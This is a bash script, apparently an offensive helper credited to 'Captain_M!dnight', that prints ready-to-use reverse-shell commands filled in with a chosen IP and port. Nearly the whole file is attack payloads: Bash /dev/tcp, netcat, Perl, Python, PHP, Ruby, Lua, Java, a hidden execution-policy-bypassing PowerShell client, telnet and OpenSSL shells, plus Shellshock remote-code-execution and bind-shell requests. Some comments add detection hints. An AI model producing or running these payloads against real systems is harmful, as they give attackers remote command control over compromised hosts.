#!/bin/bash
# ANSI colour escape sequences.
# They are stored as literal backslash text ("\033[..."), not as real ESC
# bytes; the sequences are only interpreted when printed via `echo -e` or
# when used inside a printf format string.

# Attribute reset
Color_Off="\033[0m"

# Regular colours
Black="\033[0;30m"
Red="\033[0;31m"
Green="\033[0;32m"
Yellow="\033[0;33m"
Blue="\033[0;34m"
Purple="\033[0;35m"
Cyan="\033[0;36m"
White="\033[0;37m"

# High-intensity colours
IBlack="\033[0;90m"
IRed="\033[0;91m"
IGreen="\033[0;92m"
IYellow="\033[0;93m"
IBlue="\033[0;94m"
IPurple="\033[0;95m"
ICyan="\033[0;96m"
IWhite="\033[0;97m"

# Line markers: "[+]" in green, "[-]" in red
pos="[$Green+$Color_Off]"
neg="[$Red-$Color_Off]"
# Print the coloured banner, the original-author credit and the notice that
# red text marks the values a user is expected to change.
# Globals: Red, Green, IWhite, Color_Off (read)
# Outputs: banner on stdout
ascii_art() {
  # The string content stays at column 0: it is printed verbatim.
  echo -e "
${Red}╔═╗${Green}┬ ┬┌─┐┬ ┬ ${Red}╦ ┌─┐┬ ┬┌─┐┬─┐
${Red}╚═╗${Green}├─┤├┤ │ │ ${Red}║ │ │└┐┌┘├┤ ├┬┘
${Red}╚═╝${Green}┴ ┴└─┘┴─┘┴─┘ ${Red}╩═╝└─┘ └┘ └─┘┴└─
${IWhite}Original Author : Captain_M!dnight
[${Red}NOTICE${Color_Off}]Texts in red are changable
${Color_Off}"
}
# Print the interactive "Shells: " prompt without a trailing newline.
# Globals: IGreen, Color_Off (read)
prompt() {
  # %b expands the \033 colour escapes stored in the variables while keeping
  # the variable data out of the printf format string.
  printf '%b' "${IGreen}Shells${IGreen}:${Color_Off} "
}
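# Print the numbered menu of payload families plus the tool-discovery hint.
# Globals: colour variables (read)
# Outputs: menu on stdout
_reverse_shell_menu() {
  echo -e "
[${Blue}1${Color_Off}]Bash [${IRed}2${Color_Off}]Ruby
[${Green}3${Color_Off}]Perl [${Cyan}4${Color_Off}]Netcat
[${Yellow}5${Color_Off}]Python [${IYellow}6${Color_Off}]Java
[${Purple}7${Color_Off}]PHP [${IBlue}8${Color_Off}]Shellshock
[${Cyan}9${Color_Off}]Lua [${Blue}10${Color_Off}]Powershell
[${Green}11${Color_Off}]Telnet [${Yellow}12${Color_Off}]Open_ssl
"
  echo -e "${Green}Hint${Color_Off} Find out what programs are installed with:"
  echo -e 'for item in $(echo "nmap nc perl python ruby gcc wget sudo curl"); do which $item; done\n'
}

# Show the menu, then read menu numbers in a loop and call the matching
# printer function. "exit", "q" or "quit" terminates the script.
# Globals: none written; the printer functions read ipaddr and port
# Inputs:  one menu choice per line on stdin
# Returns: does not return; exits 0 on quit or on end of input
reverse_shell_list() {
  local shell_type
  _reverse_shell_menu
  while true; do
    prompt
    # -r keeps backslashes literal. A failed read means end of input
    # (Ctrl-D or a closed pipe); without this check the loop would spin
    # forever on an empty choice.
    if ! read -r shell_type; then
      echo
      exit 0
    fi
    case "$shell_type" in
      1) bash_shell ;;
      2) ruby_shell ;;
      3) perl_shell ;;
      4) netcat_shell ;;
      5) python_shell ;;
      6) java_shell ;;
      7) php_shell ;;
      8) shellshock ;;
      9) lua_shell ;;
      10) powershell ;;
      11) telnet ;;
      12) open_ssl ;;
      "exit" | "q" | "quit") exit 0 ;;
      *)
        # Re-print the menu and keep looping; calling reverse_shell_list
        # again here would nest a new read loop for every invalid entry.
        echo -e "[-]Enter the shell number"
        _reverse_shell_menu
        ;;
    esac
  done
}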
## Values the user is expected to change are printed in a different color ##
# Print three Bash command templates with $ipaddr/$port filled in.
# The function only prints text; it opens no connection itself.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: four lines on stdout
# Detection note: every template relies on a /dev/tcp/ redirection, so that
# string in shell command lines or audit logs is a practical indicator.
bash_shell() {
  local label="${pos}${Yellow}"
  local target="${Red}$ipaddr/$port${Color_Off}"
  echo -e "${label}Bash shell:${Color_Off}"
  echo -e "${label}Bash shell [1]:${Color_Off}bash -i >& /dev/tcp/${target} 0>&1"
  echo -e "${label}Bash shell [2]:${Color_Off}exec 5<>/dev/tcp/${target};cat <&5 | while read line; do $line 2>&5 >&5; done"
  echo -e "${label}Bash shell [3]:${Color_Off}exec /bin/sh 0</dev/tcp/${target} 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196"
}
# Print the Perl one-liner template with $ipaddr and $port filled in.
# The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: one line on stdout
perl_shell() {
  echo -e "${pos}${Yellow}Perl shell:${Color_Off} perl -e 'use Socket;${Red}\$i=\"$ipaddr\"${Color_Off};${Red}\$p=$port${Color_Off};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
}
# Print the Python one-liner template with $ipaddr and $port filled in.
# The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: one line on stdout
python_shell() {
  echo -e "${pos}${Yellow}Python shell:${Color_Off} python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((${Red}\"$ipaddr\",$port${Color_Off}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
}
# Print the PHP one-liner template with $ipaddr and $port filled in.
# The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: one line on stdout
php_shell() {
  echo -e "${pos}${Yellow}PHP shell:${Color_Off} php -r '\$sock=fsockopen(\"${Red}$ipaddr\",$port${Color_Off});exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
}
# Print the Ruby one-liner template with $ipaddr and $port filled in.
# The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: one line on stdout
ruby_shell() {
  echo -e "${pos}${Yellow}Ruby shell:${Color_Off} ruby -rsocket -e'f=TCPSocket.open(${Red}\"$ipaddr\",$port${Color_Off}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
}
# Print three netcat command templates with $ipaddr and $port filled in.
# The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: three templates on stdout, the first two followed by a blank line
# Detection note: templates [2] and [3] create named pipes at the fixed paths
# /tmp/f and /tmp/l, which are file-system artefacts worth monitoring.
netcat_shell() {
  local label="${pos}${Yellow}"
  local peer="${Red}$ipaddr $port${Color_Off}"
  echo -e "${label}Netcat shell [1]:${Color_Off} nc -e /bin/sh ${peer}\n"
  echo -e "${label}Netcat shell [2]:${Color_Off} rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ${peer} >/tmp/f\n"
  echo -e "${label}Netcat shell [3]:${Color_Off} rm /tmp/l;mknod /tmp/l p;/bin/sh 0</tmp/l | nc ${peer} 1>/tmp/l"
}
# Print the Java/Groovy-style Runtime.exec template with $ipaddr and $port
# filled in. The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: four lines plus a trailing blank line on stdout
java_shell() {
  # The string content stays at column 0: it is printed verbatim.
  echo -e "${pos}${Yellow}Java shell:${Color_Off}
r = Runtime.getRuntime()
p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/${Red}$ipaddr${Color_Off}/${Red}$port${Color_Off};cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[])
p.waitFor()
"
}
# Print two Shellshock request templates. Neither uses $ipaddr or $port:
# the target and command appear as the placeholders TARGET_IP, <TARGET_IP>
# and YOUR_COMMAND. The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off (read)
# Outputs: the first template, a blank line, a label and the second template
# Detection note: both templates put a "() {" function definition in the
# User-Agent header, so that prefix in HTTP header logs is the indicator to
# alert on for CGI endpoints.
shellshock() {
  echo -e "${pos}${Yellow}Shellshock [RCE]:${Color_Off} wget -U \"() { test;};echo \"Content-type: text/plain\"; echo; echo; ${Red}YOUR_COMMAND${Color_Off}\" http://${Red}TARGET_IP${Color_Off}/cgi-bin/status\n"
  echo -e "${pos}${Yellow}Shellshock [bind shell]:${Color_Off}"
  # Plain echo (no -e): the doubled backslashes are printed as \r\n text.
  echo "echo -e \"HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () { :;}; /usr/bin/nc -l -p 4444 -e /bin/sh\\r\\nHost: <TARGET_IP>\\r\\nConnection: close\\r\\n\\r\\n\" | nc <TARGET_IP> 80"
}
# Print the Lua one-liner template with $ipaddr and $port filled in.
# The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: one line on stdout
lua_shell() {
  echo -e "${pos}${Yellow}Lua shell:${Color_Off} lua5.1 -e 'local host,port = \"${Red}$ipaddr${Color_Off}\",${Red}$port${Color_Off} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host,port); while true do local cmd,status,partial = tcp:receive() local f = io.popen(cmd,'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'"
}
# Print the PowerShell one-liner template with $ipaddr and $port filled in.
# The function only prints text; nothing is executed.
# Globals: pos, Yellow, Red, Color_Off, ipaddr, port (read)
# Outputs: one line on stdout
# Detection note: the printed command line carries -NoP -NonI -W Hidden
# -Exec Bypass and pipes received data into iex; process command-line
# logging and PowerShell script-block logging both surface these.
powershell() {
  echo -e "${pos}${Yellow}Powershell:${Color_Off} powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"${Red}$ipaddr${Color_Off}\",${Red}$port${Color_Off});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()"
}
# Print the telnet command template and the two listener commands it needs:
# input on $port, output on the hard-coded port 9999.
# The function only prints text; nothing is executed. Inside this script the
# function name shadows the telnet binary.
# Globals: pos, Yellow, Red, Green, Color_Off, ipaddr, port (read)
# Outputs: four lines on stdout
telnet() {
  echo -e "${pos}${Yellow}Telnet Reverse Shell:${Color_Off} telnet ${Red}$ipaddr $port${Color_Off} | /bin/bash | telnet ${Red}$ipaddr 9999${Color_Off}"
  # The string content stays at column 0: it is printed verbatim.
  echo -e "[${Red}*${Color_Off}]Set two listeners:
[${Red}Input${Color_Off}] nc -lnvvp ${Red}$port${Color_Off}
[${Green}Output${Color_Off}] nc -lnvvp ${Red}9999${Color_Off}"
}
# Print the OpenSSL workflow: certificate/key generation and the s_server
# listener for the operator side, then the s_client pipeline for the remote
# side, with $ipaddr and $port filled in.
# The function only prints text; nothing is executed.
# Globals: pos, Yellow, Green, Red, Color_Off, ipaddr, port (read)
# Outputs: four lines on stdout
# Detection note: the session is TLS-wrapped, so network content inspection
# sees little; host telemetry is the better signal (a shell whose stdio is
# piped to openssl s_client, and the fixed FIFO path /tmp/s).
open_ssl() {
  echo -e "${pos}${Yellow}Open_ssl Reverse Shell:"
  echo -e "${Color_Off}${Green}On your machine: ${Color_Off}openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes"
  echo -e "${Green}On your machine: ${Color_Off}openssl s_server -quiet -key key.pem -cert cert.pem -port ${Red}$port${Color_Off}"
  echo -e "${Green}Reverse Shell on the compromised machine:${Color_Off}mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ${Red}$ipaddr${Color_Off}:${Red}$port${Color_Off} > /tmp/s; rm /tmp/s"
}
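# Entry point: takes the listener address and port from the command line,
# prints the banner, then either shows usage or starts the interactive menu.
# Arguments: $1 - IP address, $2 - port
# NOTE(review): both values are interpolated unvalidated into `echo -e`
# strings by the printer functions, so backslash escapes inside them are
# interpreted when printed.
ipaddr=$1
port=$2
ascii_art
# Both arguments are required. The previous `&&` test only caught the case
# where both were missing, so a lone address produced templates with an
# empty port.
if [[ -z "$ipaddr" || -z "$port" ]]; then
  echo "[*]Usage: $0 <ipaddress> <port>"
  exit 1
fi
reverse_shell_list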